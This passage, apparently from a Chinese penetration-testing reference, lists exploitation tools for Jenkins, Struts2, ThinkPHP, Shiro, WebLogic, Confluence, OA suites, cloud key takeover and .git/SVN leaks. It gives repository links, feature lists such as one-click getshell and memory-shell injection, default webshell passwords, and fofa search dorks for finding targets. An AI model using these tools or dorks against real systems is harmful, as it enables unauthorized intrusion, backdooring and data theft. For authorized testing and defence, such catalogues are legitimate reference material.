FILE] [-t TYPE] [-c COOKIE] [-l LDAP] [-r RMI] 403 | [-pro PROTOCOL] [-proxy PROXY] 404 | 405 | 功能:批量检测是否存在fastjson/jackson漏洞(未使用-f时,默认检测fastjson) 406 | 407 | optional arguments: 408 | -h, --help show this help message and exit 409 | -uf URLFILE, --urlfile URLFILE 410 | [可选] 指定批量目标(文本路径) 411 | -u URL, --url URL [可选] 指定目标 412 | -req REQUEST, --request REQUEST 413 | [可选] 指定请求包,默认为http协议发送请求 414 | -to TIMEOUT, --timeout TIMEOUT 415 | [非必须] 指定请求超时时长,默认为5秒 416 | -f FILE, --file FILE [非必须] 指定payload(文本路径),默认为template/fastjson.txt 417 | -t TYPE, --type TYPE [非必须] 指定请求类型为get或post,默认为post 418 | -c COOKIE, --cookie COOKIE 419 | [非必须] 设置cookie值,默认为空 420 | -l LDAP, --ldap LDAP [可选] 指定ldap地址,ip:端口/路径 或 域名:端口/路径 421 | -r RMI, --rmi RMI [可选] 指定rmi地址,ip:端口 或 域名:端口 422 | -pro PROTOCOL, --protocol PROTOCOL 423 | [可选] 指定请求包的协议类型,需结合-req参数使用,默认为http 424 | -proxy PROXY, --proxy PROXY 425 | [可选] 设置代理,例:--proxy http://127.0.0.1:8080 426 | ``` 427 | 428 | # Jenkins 综合漏洞利用工具 429 | 430 | ## 项目地址 431 | 432 | ``` 433 | https://github.com/TheBeastofwar/JenkinsExploit-GUI 434 | ``` 435 | 436 | ## 项目介绍 437 | 438 | ``` 439 | 支持检测: 440 | CVE-2015-8103/CVE-2016-0788 Jenkins 反序列化远程代码执行 https://github.com/Medicean/VulApps/tree/master/j/jenkins/1 441 | CVE-2016-0792 Jenkins XStream反序列化远程代码执行 https://github.com/jpiechowka/jenkins-cve-2016-0792 442 | CVE-2017-1000353 Jenkins-CI 远程代码执行漏洞 https://github.com/vulhub/CVE-2017-1000353 443 | CVE-2018-1000600 Jenkins GitHub SSRF+信息泄露 444 | CVE-2018-1000861 Jenkins 绕过Groovy沙盒未授权命令执行漏洞 https://github.com/orangetw/awesome-jenkins-rce-2019 445 | CVE-2018-1999002 Jenkins 任意文件读取 https://mp.weixin.qq.com/s/MOKeN1qEBonS8bOLw6LH_w 446 | CVE-2019-1003000 Jenkins 远程代码执行 https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc 447 | CVE-2019-1003005/CVE-2019-1003029 远程代码执行(Script Security Plugin沙箱绕过) https://github.com/orangetw/awesome-jenkins-rce-2019 448 | CVE-2024-23897 Jenkins CLI 接口任意文件读取漏洞 https://github.com/vulhub/vulhub/blob/master/jenkins/CVE-2024-23897 449 | ``` 450 | 451 | ![image](assets/image-20240627095322-zf9bpzu.png) 452 | 453 | # Struts2 全版本漏洞检测工具 454 | 455 | ## 项目地址 456 | 457 | ``` 458 | https://github.com/abc123info/Struts2VulsScanTools 459 | ``` 460 | 461 | ## 项目介绍 462 | 463 | ``` 464 | 1、点击“检测漏洞”,会自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021、S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。 465 | 466 | 2、“批量验证”,(为防止批量geshell,此功能已经删除,并不再开发)。 467 | 468 | 3、S2-020、S2-021仅提供漏洞扫描功能,因漏洞利用exp很大几率造成网站访问异常,本程序暂不提供。 469 | 470 | 4、对于需要登录的页面,请勾选“设置全局Cookie值”,并填好相应的Cookie,程序每次发包都会带上Cookie。 471 | 472 | 5、作者对不同的struts2漏洞测试语句做了大量修改,执行命令、上传功能已经能通用。 473 | 474 | 6、支持GET、POST、UPLOAD三种请求方法,您可以自由选择。(UPLOAD为Multi-Part方式提交) 475 | 476 | 7、部分漏洞测试支持UTF-8、GB2312、GBK编码转换。 477 | 478 | 8、每次操作都启用一个线程,防止界面卡死。 479 | ``` 480 | 481 | ![image](assets/image-20240627095433-z1d6prl.png) 482 | 483 | # Thinkphp 综合漏洞利用工具 484 | 485 | ## 项目地址 486 | 487 | ``` 488 | https://github.com/Lotus6/ThinkphpGUI 489 | ``` 490 | 491 | ``` 492 | https://github.com/bewhale/thinkphp_gui_tools 493 | ``` 494 | 495 | ## 项目介绍 496 | 497 | ``` 498 | Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。 499 | 支持版本:(检查,命令执行,getshell) 500 | ThinkPHP 5.0 RCE 501 | ThinkPHP 5.0.10 RCE 502 | ThinkPHP 5.0.22/5.1.29 RCE 503 | ThinkPHP 5.0.23 RCE 504 | ThinkPHP 5.0.24-5.1.30 RCE 505 | ThinkPHP 3.x RCE 506 | ThinkPHP 5.x 数据库信息泄露 507 | ThinkPHP5.x日志泄露 508 | ThinkPHP3.x日志泄露 509 | ThinkPHP 3.x 日志包含RCE 510 | Thinkphp6.x日志泄漏 511 | ``` 512 | 513 | ![image](assets/image-20240627101405-x3af9e7.png) 514 | 515 | ``` 516 | ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过 517 | 支持大部分ThinkPHP漏洞检测,整合20多个payload 518 | 支持部分漏洞执行命令 519 | 支持单一漏洞批量检测 520 | 支持TP3和TP5自定义路径日志遍历 521 | 支持部分漏洞一键GetShell 522 | 支持设置代理和UA 523 | ``` 524 | 525 | ![image](assets/image-20240627102006-4vbn0vg.png) 526 | 527 | # Spring 综合漏洞利用工具 528 | 529 | ## 项目地址 530 | 531 | ``` 532 | https://github.com/charonlight/SpringExploitGUI 533 | ``` 534 | 535 | ``` 536 | https://github.com/0x727/SpringBootExploit 537 | ``` 538 | 539 | ## 项目介绍 540 | 541 | ``` 542 | 工具目前支持 543 | Spring Cloud Gateway RCE(CVE-2022-22947) 544 | Spring Cloud Function SpEL RCE (CVE-2022-22963) 545 | Spring Framework RCE (CVE-2022-22965) 546 | Spring Data Commons RCE (CVE-2018-1273)的检测以及利用 547 | 实现heapdump解密功能,并且支持模糊查询 548 | ``` 549 | 550 | ![image](assets/image-20240627104833-9sown7s.png) 551 | 552 | ``` 553 | SpringBootExploit 554 | 一款针对SpringBootEnv页面进行快速漏洞利用 555 | SnakeYAMLRCE 556 | SpELRCE 557 | EurekaXstreamRCE 558 | JolokiaLogbackRCE 559 | JolokiaRealmRCE 560 | H2DatabaseConsoleJNDIRCE 561 | SpringCloudGatewayRCE 562 | ``` 563 | 564 | ![image](assets/image-20240627105040-78fliwh.png) 565 | 566 | # Shiro 反序列化漏洞综合利用工具 567 | 568 | ## 项目地址 569 | 570 | ``` 571 | https://github.com/SummerSec/ShiroAttack2 572 | ``` 573 | 574 | ``` 575 | https://github.com/sma11new/Pyke-Shiro 576 | ``` 577 | 578 | ## 项目介绍 579 | 580 | ``` 581 | ShiroAttack2shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack 582 | javafx 583 | 处理没有第三方依赖的情况 584 | 支持多版本CommonsBeanutils的gadget 585 | 支持内存马 586 | 采用直接回显执行命令 587 | 添加了更多的CommonsBeanutils版本gadget 588 | 支持修改rememberMe关键词 589 | 支持直接爆破利用gadget和key 590 | 支持代理 591 | 添加修改shirokey功能(使用内存马的方式)可能导致业务异常 592 | 支持内存马小马 593 | 添加DFS算法回显(AllECHO) 594 | 支持自定义请求头,格式:abc:123&&&test:123 595 | ``` 596 | 597 | ![image](assets/image-20240627105705-su49pl9.png) 598 | 599 | ``` 600 | Pyke-Shiro:复杂请求下的Shiro反序列化利用工具 601 | 复杂请求可以是GET或POST,所有请求信息会被携带,可指定https,同时可选择是否保留原始数据包中的Cookie内容 602 | 假设前台输入的cookieFlag是rememberMe 603 | 604 | 复杂请求下如果勾选保留Cookie,两种情况: 605 | 一、请求包中有cookie,两种情况: 606 | 1、原始cookie内容中包含rememberMe,两种情况: 607 | a)原始cookie只有rememberMe一项,则无需保留,直接返回cookie payload 608 | b)原始cookie除了rememberMe还有其他项,则需要保留其它项,添加rememberMe的值为cookie payload 609 | 2、原始cookie中不包含rememberMe,直接拼接cookie payload即可 610 | 二、请求包中没cookie,不存在需要保留的内容,直接返回cookie payload 611 | ``` 612 | 613 | ![image](assets/image-20240627105833-30qtagk.png) 614 | 615 | # 若依 RuoYi 综合漏洞利用工具 616 | 617 | ## 项目地址 618 | 619 | ``` 620 | Ruoyi-All-1.0-SNAPSHOT这个工具是一个大佬写的没放github上,需要的可以去原作者公众号:小黑说安全,获取 621 | https://mp.weixin.qq.com/s/HU1OqZ7YFGjfc4HE3M8tPA 622 | ``` 623 | 624 | ``` 625 | https://github.com/charonlight/RuoYiExploitGUI 626 | ``` 627 | 628 | ## 项目介绍 629 | 630 | ![image](assets/image-20240627111232-o0yu9hz.png) 631 | 632 | ``` 633 | RuoYiExploitGUI_v1.0 634 | 若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具, 扫描和漏洞利用结束会自行删除所创建的定时任务。 635 | ``` 636 | 637 | ![image](assets/image-20240627110852-l8sj81i.png) 638 | 639 | # Xxl-job漏洞利用工具 640 | 641 | ## 项目地址 642 | 643 | ``` 644 | https://github.com/charonlight/xxl-jobExploitGUI 645 | ``` 646 | 647 | ## 项目介绍 648 | 649 | ``` 650 | 工具实现了XXL-JOB默认accessToken权限绕过漏洞的单个检测、批量检测、一键反弹shell功能,后续会持续更新优化,添加POC检测等。 651 | ``` 652 | 653 | ![image](assets/image-20240627164850-vfxoylp.png) 654 | 655 | # Jboss 综合漏洞利用工具 656 | 657 | ## 项目地址 658 | 659 | ``` 660 | jbosss综合利用工具by:小黑 661 | 同样与上面Ruoyi-All-1.0-SNAPSHOT RuoYi综合漏洞利用工具出自同一个作者 662 | https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ 663 | ``` 664 | 665 | ``` 666 | https://github.com/fupinglee/JavaTools/tree/master/JBoss 667 | ``` 668 | 669 | ## 项目介绍 670 | 671 | ![image](assets/image-20240627112005-llx5b02.png) 672 | 673 | ``` 674 | JBoss相关漏洞的验证工具,包括有CVE-2006-5750,CVE-2007-1036,CVE-2010-0738,CVE-2010-1871,CVE-2013-4810,CVE-2015-7501,CVE-2017-7504,CVE-2017-12149等漏洞。 675 | 676 | CVE-2010-1871,CVE-2013-4810,CVE-2015-7501,CVE-2017-7504,CVE-2017-12149可以执行命令。 677 | ``` 678 | 679 | ![image](assets/image-20240627112211-pznr73j.png) 680 | 681 | # Weblogic 综合漏洞利用工具 682 | 683 | ## 项目地址 684 | 685 | ``` 686 | 687 | https://github.com/KimJun1010/WeblogicTool 688 | ``` 689 | 690 | ## 项目介绍 691 | 692 | ``` 693 | WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等 694 | CVE-2023-21931(JNDI) 695 | CVE-2023-21839(JNDI) 696 | CVE-2020-2551(JRMP) 697 | CVE-2020-2551 698 | CVE-2020-2555 699 | CVE-2020-2883 700 | CVE-2020-14882 未授权访问 701 | CVE-2018-2894 702 | CVE-2018-2628(JRMP) 703 | CVE-2018-2893(JRMP) 704 | CVE-2018-3245(JRMP) 705 | CVE_2018_3252(JRMP) 706 | CVE_2018_3191 707 | CVE-2016-3510 708 | CVE-2016-0638 709 | CVE-2017-10271 710 | CVE-2017-3248(JRMP) 711 | CVE-2015-4852 712 | ...... 713 | ``` 714 | 715 | ![image](assets/image-20240627120159-t5v1a60.png) 716 | 717 | # Tomcat 综合漏洞利用工具 718 | 719 | ## 项目地址 720 | 721 | ``` 722 | https://github.com/tpt11fb/AttackTomcat 723 | ``` 724 | 725 | ``` 726 | https://github.com/errors11/TomcatVuln 727 | ``` 728 | 729 | ## 项目介绍 730 | 731 | ``` 732 | AttackTomcat 733 | 检测漏洞清单 734 | CVE-2017-12615 PUT文件上传漏洞 tomcat-pass-getshell 弱认证部署war包 弱口令爆破 CVE-2020-1938 Tomcat 文件读取/包含 735 | ``` 736 | 737 | ![image](assets/image-20240627140034-p4j08o0.png) 738 | 739 | ![image](assets/image-20240627140100-p4fdeel.png) 740 | 741 | ![image](assets/image-20240627140431-7i0plqs.png) 742 | 743 | # 帆软反序列化漏洞利用工具 744 | 745 | ## 项目地址 746 | 747 | ``` 748 | https://github.com/yecp181/Frchannel 749 | ``` 750 | 751 | ``` 752 | https://github.com/BambiZombie/FrchannelPlus 753 | ``` 754 | 755 | ## 项目介绍 756 | 757 | ``` 758 | 1. 本工具仅用于本地模拟环境测试, 适用于FineBI 759 | 760 | 2. 漏洞路径: /webroot/decision/remote/design/channel 761 | 762 | 3. 本工具支持jackson、hibernate、cb反序列化链来进行回显与注入内存马 763 | 764 | 4. 利用DNSLOG功能时在输入命令处输入例如:blo6bz.dnslog.cn 765 | ``` 766 | 767 |
![image](assets/image-20240627135442-l71fy4u.png) 768 | 769 | ![image](assets/image-20240627135620-r0s0fge.png) 770 | 771 | ``` 772 | 773 | 帆软bi反序列化漏洞利用工具PLUS,将原版的冰蝎内存马换成了哥斯拉,增加了suo5内存马 774 | ``` 775 | 776 | ![image](assets/image-20240627135553-9ru7crz.png) 777 | 778 | # 云资产 AK-SK 利用管理工具 779 | 780 | ## 项目地址 781 | 782 | ``` 783 | https://github.com/dark-kingA/cloudTools 784 | ``` 785 | 786 | ## 项目介绍 787 | 788 | ``` 789 | 云资产管理工具 目前工具定位是云安全相关工具,目前是两个模块 云存储工具、云服务工具, 790 | 云存储工具主要是针对oss存储、查看、删除、上传、下载、预览等等 791 | 云服务工具主要是针对rds、服务器的管理,查看、执行命令、接管等等 792 | 793 | 阿里云:接管控制台、取消接管、Oss增删改查、远程命令执行回显、历史命令记录查看、子用户列表、云数据库管理、告警管理 794 | 腾讯云:接管控制台、取消接管、Oss增删改查、远程命令执行回显、子用户列表 795 | 华为云:接管控制台、取消接管、子用户列表 796 | ucloud:接管控制台、主机查询、子用户列表查看、主用户查看、订单查看 797 | AWS: 接管控制台、创建后门、子用户列表、策略列表 后门信息 798 | ``` 799 | 800 | ![image](assets/image-20240627140732-5a1mfgs.png) 801 | 802 | # Confluence 综合漏洞利用工具 803 | 804 | ## 项目地址 805 | 806 | ``` 807 | https://github.com/Lotus6/ConfluenceMemshell 808 | ``` 809 | 810 | ## 项目介绍 811 | 812 | ``` 813 | ConfluenceMemshell 814 | Confluence CVE 2021,2022,2023 利用工具,支持命令执行,哥斯拉,冰蝎 内存马注入 815 | 816 | 支持 Confluence 版本:CVE-2021-26084,CVE-2022-26134,CVE_2023_22515,CVE-2023-22527 817 | (如果对您有帮助,感觉不错的话,请您给个大大的 ⭐️❗️) 818 | 哥斯拉默认密码:pass ,默认key:key ,请求配置 - 协议头 需加上 Connection: close 819 | 冰蝎默认密码:rebeyond,默认UA:Accept-Language:zh-CN,zh;q=0.95,n-AS,fr-RF 820 | 只有 CVE-2022-26134 版本支持哥斯拉,冰蝎自定义密码,其他版本都是默认密码 821 | V1.1版本 822 | 823 | 新增 CVE_2023_22515,用户创建,内存马注入,基于 CmdShell 的命令执行 824 | table 双击复制当前行,shell路径,key,ua 825 | 哥斯拉 memshell 地址:url+/plugins/servlet/com/atlassian/TeamManageServlet 826 | 哥斯拉默认密码:pass ,默认key:key ,请求配置 - 协议头 需加上 Connection: close 827 | CmdShell 地址:url+/plugins/servlet/com/atlassian/TeamManageServlet?team=whoami 828 | ``` 829 | 830 | ![image](assets/image-20240627141452-r6kpkoo.png) 831 | 832 | # 数据库综合利用工具 833 | 834 | ## 项目地址 835 | 836 | ``` 837 | https://github.com/SafeGroceryStore/MDUT 838 | ``` 839 | 840 | ``` 841 | https://github.com/team-ide/teamide 842 | ``` 843 | 844 | ## 项目介绍 845 | 846 | ``` 847 | MDUT(Multiple Database Utilization Tools)是中国一款集成了多种主流数据库类型的跨平台数据库利用工具。 848 | 在前身SQLTOOLS的基础上,开发了该程序(向SQLTOOLS致敬),旨在将常见的数据库利用方法集成到一个程序中,打破了各种数据库利用工具需要各种环境并造成相当不便的障碍。 849 | 此外,该工具使用JAVAFx作为GUI操作界面,美观。 850 | 同时,该程序还支持多个数据库同时运行,每个数据库都是相互独立的,这极大地方便了网络安全工作者的使用。 851 | ``` 852 | 853 | ![image](assets/image-20240627142612-xriy2tx.png) 854 | 855 | ``` 856 | Team IDE 集成MySql、Oracle、金仓、达梦、神通等数据库、SSH、FTP、Redis、Zookeeper、Kafka、Elasticsearch、Mongodb、小工具等管理工具 857 | Team · IDE 功能模块 858 | 终端 859 | 配置SSH连接,连接远程服务器 完成 860 | SSH支持rz、sz命令,rz支持批量上传 完成 861 | 支持本地终端 完成 862 | 支持节点终端 完成 863 | Zookeeper 864 | 支持单机、集群,增删改查等操作,批量删除等 完成 865 | Kafka 866 | 对Kafka主题增删改查等操作 完成 867 | 选择主题,推送、消费、删除数据等 完成 868 | Redis 869 | Redis Key搜索、模糊查询、删除、新增等 完成 870 | 字符串、哈希、列表、集合值编辑 完成 871 | Elasticsearch 872 | 索引增删改查等操作 完成 873 | 选择索引,增删改查数据等 完成 874 | 添加索引,设置字段,索引迁移等 完成 875 | Database 876 | 数据库库|用户|模式列表、表数据加载 完成 877 | 数据库库表数据增删改查、批量新增、修改、删除等操作 完成 878 | 表格选择数据导出SQL(新增、修改、删除数据SQL)等操作 完成 879 | 自定义SQL执行面板,结果查看器 完成 880 | 新建库,在线设计表,查看建表、更新表SQL语句 完成 881 | 支持数据库,MySql、Oracle、达梦、金仓、神通、Sqlite、ODBC等数据库 完成 882 | 节点 883 | 可以配置多服务器之间网络透传,内外网相互透传等 完成 884 | 小工具 885 | JSON、Yaml转换 完成 886 | 时间长转换 完成 887 | Base64、MD5等 完成 888 | 二维码生成 完成 889 | Thrift 890 | 添加thrift模块,配置thrift文件目录 完成 891 | 展示所有thrift服务、方法等 完成 892 | 双击方法运行测试 完成 893 | 性能测试,测试报告,图表展示TPS、AVG、Min、Max、T90、T99等 完成 894 | SSH隧道 895 | Mysql、Redis、Zookeeper支持SSH隧道连接,选择SSH后,填写127.0.0.1则连接到SSH本地相应资源 完成 896 | Mongodb 897 | 库管理 完成 898 | 集合管理 完成 899 | 集合索引编辑 完成 900 | 集合数据查询、新增、修改、删除 完成 901 | ``` 902 | 903 | ![image](assets/image-20240627153943-1ajvqbh.png) 904 | 905 | # DecryptTools 综合加解密后渗透工具 906 | 907 | ## 项目地址 908 | 909 | ``` 910 | https://github.com/wafinfo/DecryptTools 911 | ``` 912 | 913 | ## 项目介绍 914 | 915 | ``` 916 | DecryptTools综合解密 917 | 一款针对加解密综合利用后渗透工具 918 | 工具展示 919 | 支持22种加解密+密码查询功能 920 | 万户OA 921 | 用友NC 922 | 金蝶EAS 923 | 蓝凌OA 924 | 致远OA 925 | 宏景ERP 926 | 湖南强智 927 | 金和jc6 瑞友天翼 928 | 金和C6 Navicat 929 | 华天动力 FinalShell 930 | 亿赛通 931 | 帆软报表 932 | H3C CAS 933 | Weblogic 934 | 金蝶云星空 935 | 新华三IMC 936 | 金盘 OPAC 937 | 海康威视IVMS 8700 938 | 海康威视IP Camera 939 | 海康威视综合安防平台(iSecure) (支持全平台) 940 | JBOSS 941 | SpringEnc 942 | Druid 943 | 密码查询功能 944 | ``` 945 | 946 | ![image](assets/image-20240627144633-2abln9a.png) 947 | 948 | # 互联网厂商 API 利用工具 949 | 950 | ## 项目地址 951 | 952 | ``` 953 | https://github.com/pykiller/API-T00L 954 | ``` 955 | 956 | ``` 957 | https://github.com/mrknow001/API-Explorer 958 | ``` 959 | 960 | ## 项目介绍 961 | 962 | ``` 963 | 针对互联网各大API泄露的利用工具,包含钉钉、企业微信、飞书等 964 | 965 | ``` 966 | 967 | ![image](assets/image-20240627143837-y5l0gsi.png) 968 | 969 | ``` 970 | 工具初衷是做一个小程序、公众号、企业微信、飞书、钉钉等泄露secert后利用工具,后来发现几家接口有一定区别,认证等参数分布在不同位置,索性就做成一个比较通用的工具了。目前可以定义:请求类型、url、header、body、正则提取认证token、接口参数说明。 971 | API-Explorer是一款管理api接口的工具,可提前配置好接口,直接调用即可;可定义数据包任何位置内容,使用起来相当灵活。 972 | 973 | 应用 功能 数据库接口 974 | 微信公众号 支持 完成部分常用功能 975 | 微信小程序 支持 完成部分常用功能 976 | 企业微信 支持 完成部分常用功能 977 | 钉钉 理论支持 无 978 | 飞书 支持 完成部分常用功能 979 | 腾讯地图 支持 完成部分常用功能 980 | 高德地图 支持 完成部分常用功能 981 | 百度地图 支持 完成部分常用功能 982 | 钉钉无测试接口,写了也不知道效果,所以目前没有写。 983 | ``` 984 | 985 | ![image](assets/image-20240627144355-s3e1ix4.png) 986 | 987 | # OA 综合漏洞利用工具 988 | 989 | ## 项目地址 990 | 991 | ``` 992 | https://github.com/R4gd0ll/I-Wanna-Get-All 993 | ``` 994 | 995 | ``` 996 | https://github.com/achuna33/MYExploit 997 | ``` 998 | 999 | ``` 1000 | https://mp.weixin.qq.com/s/1MEkYv5A47DJLCKqXKT0zQ 1001 | ``` 1002 | 1003 | ``` 1004 | https://github.com/xiaokp7/TongdaOATool 1005 | ``` 1006 | 1007 | ## 项目介绍 1008 | 1009 | ``` 1010 | 介绍 1011 | 目前集成288漏洞,包括nday、1day(未公开poc) 1012 | 1013 | java环境 java version "1.8.0_121" Java(TM) SE Runtime Environment (build 1.8.0_121-b13) Java HotSpot(TM) 64-Bit Server VM (build 25.121-b13, mixed mode) 1014 | 1015 | 基于Apt-T00ls二次开发工具,I Wanna Get All 安全工具, 严禁一切未授权漏洞扫描攻击 1016 | 1017 | 使用工具或文章转发用于其他途径,请备注作者及工具地址来源。 1018 | 1019 | 使用工具前建议判断系统指纹框架,部分漏洞为接口探测存活判断是否成功,实际利用情况以执行情况为准 1020 | 1. 用友serial漏洞大部分为接口探测,请ATT根据实际情况进行判断 1021 | 2. 部分漏洞为确保准确性,请先进行检测,再进行点击执行利用 1022 | 3. 使用ALL进行漏洞探测时,由于多线程等其他原因会产生误报 1023 | 4. 文件上传漏洞,上传文件后执行进行上传,并使CMD栏为空,请先检测尝试上传后再利用 1024 | 5. 命令执行漏洞利用CMD写入命令后进行执行。 1025 | 6. 清屏按钮可清除除URL地址外所有信息 1026 | 7. 根据执行结果提示并选择其他模块利用 1027 | 8. POC模块目前集成poc情况共近230余个,包含至今HVV、goby纰漏漏洞(因poc集中管理可能出现误报,请配置代理抓包判断),如下: 1028 | (1).用友NC&反序列化接口----------------------------------fofa:title="YONYOU NC" 1029 | (2).用友GRP--------------------------------------------fofa:app="yonyou-GRP-U8" 1030 | (3).用友NCCloud----------------------------------------fofa:body="nccloud" 1031 | (4).用友tplus------------------------------------------fofa:app="畅捷通-TPlus" 1032 | (5).用友U8C--------------------------------------------fofa:app="用友-U8-Cloud" 1033 | (6).用友ufida------------------------------------------fofa:body="ufida.ico" 1034 | (7).泛微Ecology----------------------------------------fofa:app="泛微-协同办公OA" 1035 | (8).泛微Emobile----------------------------------------fofa:title="移动管理平台-企业管理" 1036 | (9).泛微Eoffice----------------------------------------fofa:app="泛微-EOffice" 1037 | (10).蓝凌OA--------------------------------------------fofa:app="Landray-OA系统" 1038 | (11).蓝凌EIS-------------------------------------------fofa:app="Landray-EIS智慧协同平台" 1039 | (12).万户OA--------------------------------------------fofa:body="/defaultroot/" 1040 | (13).致远A6A8------------------------------------------fofa:app="致远互联-OA" 1041 | (14).致远MServer---------------------------------------fofa:body="/mobile_portal/" 1042 | (15).致远yyoa------------------------------------------fofa:body="yyoa" && app="致远互联-OA" 1043 | (16).通达OA--------------------------------------------fofa:app="TDXK-通达OA" 1044 | (17).帆软组件-------------------------------------------fofa:"Powered by 帆软" 1045 | (18).金蝶Apusic----------------------------------------fofa:header="Apusic" 1046 | (19).金蝶EAS-------------------------------------------fofa:app="Kingdee-EAS" 1047 | (20).金蝶云OA------------------------------------------fofa:app="金蝶云星空-管理中心" 1048 | (21).金和OA--------------------------------------------fofa:app="金和网络-金和OA" 1049 | (22).红帆OA--------------------------------------------fofa:app="红帆-ioffice" 1050 | (23).宏景HCM--------------------------------------------fofa:app="HJSOFT-HCM" 1051 | (24).亿赛通---------------------------------------------fofa:app="亿赛通-电子文档安全管理系统" 1052 | (23).飞企互联-------------------------------------------fofa:app="FE-协作平台" 1053 | 1054 | MemShell模块 1055 | 1. 支持冰蝎3.0、哥斯拉、蚁剑、suo5、cmdecho、neoReGeorg、自定义内存马 1056 | 2. 支持输出源码、Base64、hex、gzip格式payload 1057 | 3. 用友NC反序列化 集成接口反序列化(测试环境) 1058 | 4. 用友U8C反序列化 集接口反序列化(测试环境) 1059 | 5. 亿赛通XStream反序列化 集接口反序列化(测试环境) 1060 | 6. 用友NC内存马支持bypass脏数据传入,默认为100字节 1061 | ``` 1062 | 1063 | ![image](assets/image-20240627145957-zcz22sx.png) 1064 | 1065 | ![image](assets/image-20240627151424-u1j7xhx.png) 1066 | 1067 | ``` 1068 | 该工具获取请关注原作者公众号:琴音安全 1069 | ``` 1070 | 1071 | ![image](assets/image-20240627153035-qz8pjh6.png) 1072 | 1073 | # 信息泄露利用工具 1074 | 1075 | ## Swagger API 信息泄露利用工具 1076 | 1077 | ### 项目地址 1078 | 1079 | ``` 1080 | https://github.com/jayus0821/swagger-hack 1081 | ``` 1082 | 1083 | ``` 1084 | https://github.com/lijiejie/swagger-exp 1085 | ``` 1086 | 1087 | ### 项目介绍 1088 | 1089 | ``` 1090 | Swagger-hack 2.0 1091 | 自动化爬取并自动测试所有swagger接口 1092 | 第一个版本仅适配了一个版本的swagger,不同版本见差距比较大,后续又调查了很多版本的swagger,将脚本的适配性增强了很多 1093 | 1094 | 优化: 1095 | 1096 | 适配多个版本swagger 1097 | 添加多进程 1098 | 增强了程序的健壮性 1099 | 优化了控制台显示,生成日志文件 1100 | ``` 1101 | 1102 | ![image](assets/image-20240627155236-lk8g7s3.png) 1103 | 1104 | ``` 1105 | Swagger API Exploit 1.2 1106 | 这是一个 Swagger REST API 信息泄露利用工具。 主要功能有: 1107 | 1108 | 遍历所有API接口,自动填充参数 1109 | 尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接口是否可以未授权访问利用 1110 | 分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞 1111 | 检测 API认证绕过漏洞 1112 | 在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用 1113 | 使用Chrome打开本地Web服务器,并禁用CORS,解决部分API接口无法跨域请求的问题 1114 | 当工具检测到HTTP认证绕过漏洞时,本地服务器拦截API文档,修改path,以便直接在Swagger UI中进行测试 1115 | ``` 1116 | 1117 | ![image](assets/image-20240627155326-pdu5b7r.png) 1118 | 1119 | ## Heapdump敏感信息提取工具 1120 | 1121 | ### 项目地址 1122 | 1123 | ``` 1124 | https://github.com/whwlsfb/JDumpSpider 1125 | ``` 1126 | 1127 | ``` 1128 | https://github.com/wyzxxz/heapdump_tool 1129 | ``` 1130 | 1131 | ### 项目介绍 1132 | 1133 | ``` 1134 | JDumpSpider 1135 | HeapDump敏感信息提取工具 1136 | 暂支持提取以下类型的敏感信息 1137 | 1138 | 数据源 1139 | SpringDataSourceProperties 1140 | WeblogicDataSourceConnectionPoolConfig 1141 | MongoClient 1142 | AliDruidDataSourceWrapper 1143 | HikariDataSource 1144 | 配置文件信息 1145 | MapPropertySource 1146 | OriginTrackedMapPropertySource 1147 | MutablePropertySource 1148 | ConsulPropertySource 1149 | OSS(模糊搜索) 1150 | Redis配置 1151 | RedisStandaloneConfiguration 1152 | JedisClient 1153 | ShiroKey 1154 | CookieRememberMeManager 1155 | 模糊搜索用户信息 1156 | UserPassSearcher01 1157 | 1158 | 1159 | $ java -jar .\target\JDumpSpider-1.0-SNAPSHOT-full.jar 1160 | Missing required parameter: '' 1161 | Usage: JDumpSpider [-hV] 1162 | Extract sensitive information from heapdump file. 1163 | Heap file path. 1164 | -h, --help Show this help message and exit. 1165 | -V, --version Print version information and exit. 1166 | 1167 | ``` 1168 | 1169 | ## .git 泄漏利用工具 1170 | 1171 | ### 项目地址 1172 | 1173 | ``` 1174 | https://github.com/BugScanTeam/GitHack 1175 | ``` 1176 | 1177 | ### 项目介绍 1178 | 1179 | ``` 1180 | GitHack 1181 | .git 泄漏利用工具,可还原历史版本 1182 | 1183 | 依赖 1184 | 不需要安装其它 Python 库,只需要有 git 命令 1185 | 1186 | git 1187 | ubuntu/debian: $ apt-get install git 1188 | redhat/centos: $ yum install git 1189 | windows git-for-windows下载 1190 | 使用前需确保 git 在 环境变量中 1191 | 1192 | 使用方法 1193 | python GitHack.py http://www.example.com/.git/ 1194 | 还原后的文件在 dist/ 目录下 1195 | 1196 | 工作流程 1197 | 尝试获取 packs克隆 1198 | 尝试目录遍历克隆 1199 | 尝试从缓存文件(index)、commit记录中恢复 1200 | ``` 1201 | 1202 | ## SVN源代码利用工具 1203 | 1204 | ### 项目地址 1205 | 1206 | ``` 1207 | https://github.com/admintony/svnExploit 1208 | ``` 1209 | 1210 | ### 项目介绍 1211 | 1212 | ``` 1213 | SvnExploit是一款SVN源代码利用工具,其完美支持SVN<1.7版本和SVN>1.7版本的SVN源代码泄露 1214 | 1215 | python .\svnExploit.py -u http://192.168.27.128/unit-2/lab3/.svn/ 1216 | ____ _____ _ _ _ 1217 | / ___|_ ___ __ | ____|_ ___ __ | | ___ (_) |_ 1218 | \___ \ \ / / '_ \| _| \ \/ / '_ \| |/ _ \| | __| 1219 | ___) \ V /| | | | |___ > <| |_) | | (_) | | |_ 1220 | |____/ \_/ |_| |_|_____/_/\_\ .__/|_|\___/|_|\__| 1221 | |_| 1222 | SvnExploit - Dump the source code by svn 1223 | Author: AdminTony (http://admintony.com) 1224 | https://github.com/admintony/svnExploit 1225 | 1226 | 1227 | +--------------------+----------+------------------------------------------------+ 